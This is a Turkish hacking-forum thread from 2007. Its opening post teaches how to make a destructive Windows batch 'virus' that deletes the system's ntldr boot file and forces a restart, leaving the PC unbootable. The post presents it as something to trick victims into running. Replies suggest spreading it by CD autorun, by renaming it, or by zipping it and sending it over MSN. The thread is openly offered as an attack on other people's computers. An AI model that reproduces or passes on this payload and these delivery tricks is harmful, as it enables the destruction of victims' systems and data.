pc çökertme denenmiştir

BoZKuRT_26

Üye
1 Şub 2007
210
1
EsKiŞeHiR
Arkadaşlar forumda baktım virüs oluşturmayla ilgili bir kaç konu ancak hepsindede sonu .bat oluyo onları yutturduğunuzda kurbana belki zararverebilri ama asla bu prog kadar çok zarar veremez bu program için %75 dememin sebebi yutturma ihtimaliniz eğer yutturursanız kesinlikle çöker arkadaşlar denemekte fayda var...Şimdi virüsü oluşturmaya başlayalım:

İlk önce not defterini açıyoruz.

sonra aşağıda verdiğim kodları not defterine yapıştırıyoruz.Bu kodlarda çok ya da az yazmak onemli değil 1 tane de yazsanız yeter arkadaşlar...Kod:

cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
shutdown -r

Ewt.. bu kodları yazdıktan sonra dosyanın uzantısını .txt yerine .bat yazpıyoruzz...

İşte virüsümüz hazır eğer yutturabilriseniz garanti veriyorum pc çöker hemde %100

Şimdi onu süslein püslein..bat uzantısı kaydedin bitti.

denenmiştir

cakalfatih

Yeni üye
26 Haz 2007
32
0
msn de rar lamadan nası göndercen kardeş maksat konu açmak için konu açıyosunuz alıntı yap yolla

cakan07

Yeni üye
25 Ağu 2007
18
0
arkadaşlar bunu autorun yapın ve cd nin içine atın cd takıldığı zamn bilgisayar çöksün

baris00

Yeni üye
7 Ağu 2007
31
0
abiler kimse yemiyo bunları yapıldığı zaman doğrudur ama bilgisayardan anlamaması lazım onuda neden yapacan ki garibana dimi ama

mehmedım

Üye
10 Mar 2007
183
0
valla bu .bat işini kimse açmaz sanki simgesi bi acayip kardeşim kim yer ki bunu grçi benim salak kardeşim yer onun yüzünden bu hafta 3. format :D

<dream_team>

Katılımcı Üye
11 Ağu 2007
500
1
Evet Banad Aanlamsiz Geldİ .bat Olmasin Dİyorsun Fakat Sen Kendİn .bat Yapin Dİyorsun Ne İŞ Anlamadim...

ukalatm

Yeni üye
26 Ağu 2007
1
0
arkadslar not defterınde bat cevırıcem ama bı sorunla karsılastım dosya adı bat oluyo ama uzantısı txt olarak deyıstremıyorsun bunu cevırmenın bı yolunu soleyebılrımısınız !!

Afv-cLub

Yeni üye
10 Eyl 2007
3
0
kendin açarsan gümlersin.Arkadaşlar .bat yaptıktan sonra dosya ismini yada tipini değiştirin.sonra winrar yada winzipleyin msnden yada nerden atarsanız atan kurban buna tıkladıgı anda c=delete pc güm.!

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.